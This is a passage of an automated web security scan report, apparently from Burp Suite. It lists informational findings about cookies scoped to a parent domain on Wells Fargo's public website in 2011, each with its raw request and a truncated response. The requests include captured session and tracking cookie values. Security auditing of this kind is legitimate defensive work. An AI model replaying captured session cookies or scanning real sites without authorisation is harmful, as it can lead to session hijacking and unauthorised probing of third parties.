Content-type: text/html; charset=ISO-8859-1
Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<IMPORTBEAN BEAN="/wellsfargo/www/onlinebrokerage/education/TradingCatalog">
<head>
<title>Wells Fargo Online Brokerage</title>

<script language="JavaScript" type="text/javascript">


       document.w
...[SNIP]...

10.177. https://www.wellsfargo.com/per/more/banking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/banking

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /per/more/banking HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:39 GMT
Content-length: 10949
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Banking Overview</
...[SNIP]...

10.178. https://www.wellsfargo.com/per/more/loans_credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/loans_credit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /per/more/loans_credit HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:40 GMT
Content-length: 10611
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Loans an
...[SNIP]...

10.179. https://www.wellsfargo.com/personal_credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_credit/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:47 GMT
Content-length: 7834
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Personal C
...[SNIP]...

10.180. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/rate_payments/rate_calc_main

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo ... Rate & Payment
...[SNIP]...

10.181. https://www.wellsfargo.com/privacy_security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7654
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...

10.182. https://www.wellsfargo.com/privacy_security/fraud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 7546
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...

10.183. https://www.wellsfargo.com/privacy_security/fraud/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/report/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 6368
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

10.184. https://www.wellsfargo.com/privacy_security/fraud/report/fraud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 5794
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

10.185. https://www.wellsfargo.com/privacy_security/online/guarantee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/online/guarantee

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy_security/online/guarantee HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

10.186. https://www.wellsfargo.com/products_services/HE_selector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/HE_selector

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/HE_selector HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:58 GMT
Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp
Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

10.187. https://www.wellsfargo.com/products_services/applications_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/applications_viewall

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/applications_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo - Apply for an Acc
...[SNIP]...

10.188. https://www.wellsfargo.com/products_services/brokerage_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/brokerage_cklist

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/brokerage_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en
Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/product
...[SNIP]...

10.189. https://www.wellsfargo.com/products_services/deposit_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/deposit_cklist

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/deposit_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist
Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

10.190. https://www.wellsfargo.com/products_services/pll_select  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/pll_select

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products_services/pll_select HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:56 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select
Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

10.191. https://www.wellsfargo.com/rates/rates_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /rates/rates_viewall

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rates/rates_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-length: 4031
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.192. https://www.wellsfargo.com/savings_cds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-length: 10180
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Savings Account - Compar
...[SNIP]...

10.193. https://www.wellsfargo.com/savings_cds/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/apply

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open a Savings Account or CD</
...[SNIP]...

10.194. https://www.wellsfargo.com/savings_cds/cds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/cds

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings_cds/cds HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11464
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>CD Account - Find the Best CD
...[SNIP]...

10.195. https://www.wellsfargo.com/search/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /search/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:02 GMT
Content-type: text/html; charset=utf-8
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

10.196. https://www.wellsfargo.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /sitemap

Issue detail

